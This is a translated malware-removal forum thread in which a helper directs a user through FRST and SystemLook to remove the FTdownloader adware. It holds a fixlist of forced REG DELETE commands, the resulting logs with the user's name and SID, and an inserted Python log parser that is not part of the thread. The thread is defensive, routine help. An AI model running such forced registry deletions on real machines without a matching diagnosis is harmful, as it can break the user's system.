reg: REG DELETE "HKU\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c" /f
C:\Program Files\Enigma Software Group
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\FTdownloader V4.0.lnk
C:\Users\Moritz\AppData\Local\Cool_Mirage
C:\Program Files (x86)\FTDownloader.com
C:\Program Files (x86)\FTdownloader V4.0
C:\Windows\Tasks\FTdownloader V4.0-codedownloader.job
C:\Windows\Tasks\FTdownloader V4.0-enabler.job     
C:\Windows\Tasks\FTdownloader V4.0-updater.job


Please save this as Fixlist.txt on your desktop (or in the directory where FRST is located).
  • Now start FRST again and click the Remove (Entfernen) button.
  • The tool creates a Fixlog.txt.
  • Post its contents for me.


Minter 13.08.2013 14:08

If I save it on the desktop, FRST doesn't find it. What / where is the directory in which FRST is located?

cosinus 13.08.2013 14:21

Quote:

where is the directory in which FRST is located?
You should know where you saved the tool :wtf:
Download it again, to the desktop

Minter 13.08.2013 14:36

^^ Oh, I see

Code:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 13-08-2013
Ran by Moritz at 2013-08-13 15:34:47 Run:1
Running from C:\Users\Moritz\Desktop
Boot Mode: Normal
==============================================


========= REG DELETE "HKCU\Software\AppDataLow\Software\FTdownloader V4.0" /f =========

Der Vorgang wurde erfolgreich beendet.



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Classes\FTDownloader"  /f =========

Der Vorgang wurde erfolgreich beendet.



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Tracing\FTDownloader_RASAPI32" /f =========

Der Vorgang wurde erfolgreich beendet.



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Tracing\FTDownloader_RASMANCS" /f =========

Der Vorgang wurde erfolgreich beendet.



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}" /f =========

FEHLER: Zugriff verweigert



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}" /f =========

FEHLER: Zugriff verweigert



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}" /f =========

FEHLER: Zugriff verweigert



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader" /f =========

FEHLER: Zugriff verweigert



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler" /f =========

FEHLER: Zugriff verweigert



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater" /f =========

FEHLER: Zugriff verweigert



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\FTdownloader V4.0" /f =========

Der Vorgang wurde erfolgreich beendet.



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lgnbhdnimikkoodkogjlcllngimhlapp" /f =========

Der Vorgang wurde erfolgreich beendet.



========= End of Reg: =========


========= REG DELETE "HKU\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= End of Reg: =========

"C:\Program Files\Enigma Software Group" => File/Directory not found.
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\FTdownloader V4.0.lnk => Moved successfully.
C:\Users\Moritz\AppData\Local\Cool_Mirage => Moved successfully.
"C:\Program Files (x86)\FTDownloader.com" => File/Directory not found.
C:\Program Files (x86)\FTdownloader V4.0 => Moved successfully.
C:\Windows\Tasks\FTdownloader V4.0-codedownloader.job => Moved successfully.
C:\Windows\Tasks\FTdownloader V4.0-enabler.job        => Moved successfully.
C:\Windows\Tasks\FTdownloader V4.0-updater.job => Moved successfully.

==== End of Fixlog ====
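
Added example, not part of the thread and not FRST's own code: a small Python parser for the Fixlog format posted above that separates entries needing a second look (refused deletes, key paths with unbalanced braces) from harmless misses. The sample log is a shortened excerpt in the same format; the function names and hint texts are assumptions, as is treating an HKU\<SID> miss as the already-deleted HKCU key, which holds only when the SID belongs to the user who ran the fix.

```python
import re

# Shortened excerpt in the format of the Fixlog above (sample input for this example).
SAMPLE_FIXLOG = r'''
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 13-08-2013
========= REG DELETE "HKCU\Software\AppDataLow\Software\FTdownloader V4.0" /f =========

Der Vorgang wurde erfolgreich beendet.

========= End of Reg: =========

========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater" /f =========

FEHLER: Zugriff verweigert

========= End of Reg: =========

========= REG DELETE "HKU\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.

========= End of Reg: =========

========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.

========= End of Reg: =========

"C:\Program Files (x86)\FTDownloader.com" => File/Directory not found.
C:\Windows\Tasks\FTdownloader V4.0-updater.job => Moved successfully.
==== End of Fixlog ====
'''

REG_HEADER = re.compile(r'^=+\s*REG\s+\w+\s+"(?P<key>[^"]+)".*=+$', re.IGNORECASE)
REG_END = re.compile(r'^=+\s*End of Reg:\s*=+$', re.IGNORECASE)
FILE_LINE = re.compile(r'^"?(?P<path>[A-Za-z]:\\.*?)"?\s*=>\s*(?P<result>.+)$')
USER_HIVE = re.compile(r'^HKU\\S-1-5-21-[\d-]+\\(?P<rest>.+)$', re.IGNORECASE)
ALIAS_HINT = "same key as an HKCU entry that was already deleted"


def classify(message):
    """Map a result message to a status. The German strings are the ones in
    the log above; the English alternatives are assumed wording."""
    m = message.lower()
    if "erfolgreich" in m or "successfully" in m:
        return "ok"
    if "zugriff verweigert" in m or "access is denied" in m:
        return "access_denied"
    if "nicht gefunden" in m or "not found" in m or "unable to find" in m:
        return "not_found"
    return "unknown"


def parse_fixlog(text):
    """Return one dict per fixlist entry: kind, target, status, hint."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        head = REG_HEADER.match(line)
        if head:                                   # start of a "reg:" block
            current = {"target": head.group("key"), "output": []}
        elif REG_END.match(line):                  # end of a "reg:" block
            if current:
                entries.append({"kind": "reg", "target": current["target"],
                                "status": classify(" ".join(current["output"])),
                                "hint": ""})
            current = None
        elif current is not None:                  # reg.exe output inside a block
            current["output"].append(line)
        else:                                      # "<path> => <result>" file line
            moved = FILE_LINE.match(line)
            if moved:
                entries.append({"kind": "file", "target": moved.group("path"),
                                "status": classify(moved.group("result")),
                                "hint": ""})
    return entries


def annotate(entries):
    """Attach a hint to every failed registry entry that can be explained."""
    deleted_hkcu = {e["target"][5:].lower() for e in entries
                    if e["status"] == "ok" and e["target"].upper().startswith("HKCU\\")}
    for e in entries:
        if e["kind"] != "reg" or e["status"] == "ok":
            continue
        alias = USER_HIVE.match(e["target"])
        if e["target"].count("{") != e["target"].count("}"):
            e["hint"] = "unbalanced braces in key path: check the fixlist line for a typo"
        elif e["status"] == "access_denied":
            e["hint"] = "delete refused: the key was not removed"
        elif e["status"] == "unknown":
            e["hint"] = "unrecognised result message"
        elif alias and alias.group("rest").lower() in deleted_hkcu:
            e["hint"] = ALIAS_HINT                 # HKCU aliases HKU\<SID of current user>
    return entries


def needs_followup(entries):
    """Entries that failed for a reason other than 'already gone'."""
    return [e for e in annotate(entries) if e["hint"] and e["hint"] != ALIAS_HINT]


if __name__ == "__main__":
    for item in needs_followup(parse_fixlog(SAMPLE_FIXLOG)):
        print(item["status"], "|", item["target"], "|", item["hint"])
```

A key reported as not found under a path with an unclosed `{` says nothing about whether the intended key exists, so it is listed for a re-check rather than counted as removed.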


cosinus 13.08.2013 14:48

Very good. Download http://ryder.trojaner-board.de/spyhu...nterKiller.exe again and run it once more. The tool has only just been updated.

After that, run SystemLook again as you did before and post the new log

Minter 13.08.2013 15:02

Code:

SystemLook 30.07.11 by jpshortstuff
Log created at 16:00 on 13/08/2013 by Moritz
Administrator - Elevation successful

========== filefind ==========

Searching for "*FTdownloader*"
C:\FRST\Quarantine\FTdownloader V4.0-codedownloader.job        --a---- 1226 bytes        [12:16 26/07/2013]        [12:37 13/08/2013] DDF661E8F32DD055D5C6C0A178711B02
C:\FRST\Quarantine\FTdownloader V4.0-enabler.job        --a---- 1136 bytes        [12:16 26/07/2013]        [12:37 13/08/2013] F805BB31237EC183E3DE019756961A9E
C:\FRST\Quarantine\FTdownloader V4.0-updater.job        --a---- 1232 bytes        [12:16 26/07/2013]        [12:37 13/08/2013] 33E221F47F84CA666E567C921A1C1B83
C:\FRST\Quarantine\FTdownloader V4.0.lnk        --a---- 726 bytes        [07:36 13/08/2013]        [07:36 13/08/2013] 790AACB9534E01ABB21F1480C6D9A1B8
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-buttonutil.dll        --a---- 393216 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 079E87F2A760FC41C6A6767BCB87B5F2
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-buttonutil.exe        --a---- 338432 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] BA25FC5D1BEDBE821F063D6956BEBA4D
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.dll        --a---- 473088 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] D2E25B7E08F1370BE1B649E96B33142F
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.exe        --a---- 442880 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 2185767A2A7BCA1CD4570E0DCF6F9350
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-helper.exe        --a---- 311808 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 033E5078BCE5B537286E8E256C91D434
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0.ico        --a---- 9662 bytes        [11:19 30/06/2013]        [11:19 30/06/2013] 0A8D41A2552E2FC0A5CCD4AEB106FBF2
C:\Windows\System32\Tasks\FTdownloader V4.0-codedownloader        --a---- 4256 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 77F95681B9972C1DDE808B209EAC739B
C:\Windows\System32\Tasks\FTdownloader V4.0-enabler        --a---- 4166 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 3C451D483016AB248AC0B8FBDB56E673
C:\Windows\System32\Tasks\FTdownloader V4.0-updater        --a---- 4262 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] A5216EE89CA0126CFBA1044B683DE65E

Searching for "*Spyhunter*"
C:\Windows\Prefetch\SPYHUNTER4.EXE-5B920D84.pf        --a---- 165806 bytes        [17:24 27/07/2013]        [13:46 12/08/2013] 2F407C91D7454A65F9ED0F5947160ED8

========== folderfind ==========

Searching for "*FTdownloader*"
C:\FRST\Quarantine\FTdownloader V4.0        d------        [12:15 26/07/2013]
C:\FRST\Quarantine\Cool_Mirage\FTDownloader.exe_Url_srel2ybtny14zdfla5iaze4jen4lh3ou        d------        [12:15 26/07/2013]

Searching for "*Spyhunter*"
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02        d----c-        [18:32 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b        d----c-        [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1        d----c-        [17:55 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981        d----c-        [17:54 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0        d----c-        [17:53 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35        d----c-        [17:17 11/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7        d----c-        [13:45 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e        d----c-        [13:43 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a        d----c-        [13:46 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876        d----c-        [15:10 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652        d----c-        [18:18 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6        d----c-        [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450        d----c-        [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02        d----c-        [18:32 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b        d----c-        [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1        d----c-        [17:55 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981        d----c-        [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0        d----c-        [17:53 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35        d----c-        [17:17 11/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7        d----c-        [13:45 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e        d----c-        [13:43 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a        d----c-        [13:46 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876        d----c-        [15:10 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652        d----c-        [18:18 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6        d----c-        [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450        d----c-        [17:54 07/08/2013]

========== regfind ==========

Searching for "FTdownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}]
"Path"="\FTdownloader V4.0-updater"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}]
"Path"="\FTdownloader V4.0-enabler"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}]
"Path"="\FTdownloader V4.0-codedownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppName"="FTdownloader V4.0-buttonutil64.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppName"="FTdownloader V4.0-codedownloader.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppName"="FTdownloader V4.0-bg.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppName"="FTdownloader V4.0-buttonutil.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppName"="FTdownloader V4.0-helper.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"

Searching for "Spyhunter"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\Defs\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\167ED423049710645A22436AA88D0A99]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\1F94163E4B8E8524AB2D208677C1C639]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoCheckUpdate"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\21B3B2A547DD5C14583129BD7D54AE43]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\270D6EC2A97B99548BA1F764A91027A1]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\2BAC083D35096B44C91BE7BCF2A9BE35]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\325484F6157B534449A295F31E20CC49]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\EsgScanner.inf"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3A1F744C14FB4E14A93C1628CDE36240]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorWinCom_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3B801397615ADA446AA0C0D27F8C35F5]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ShieldOnBoot"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\4EE16055EDFAB8E46BCE054F706E7050]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5942B0FB3B0060E4FB3008F9D51CFC26]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\native.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5A2C306FF7B069949928B69774A9C8A0]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\GuardStatus"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\64717EB28EB8ECA4A9584B6BA7934B83]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActiveDesktop_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\79455857BB467F24D81891AAD09F7079]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGScanner.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8014B476AFF7674499E83E22C791A5A2]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8D95E4363DF07F44FB6986E629D65FDB]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActHomePageProt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\96F935B48BE0455459DB1E7E97E04BDF]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorDNS"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\9BDCF589B9440364E8DB3F9535DDBB9F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Defman.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B435C9AD1BF350D48BE80D5A79BA2EEE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGRKCHK.exe"
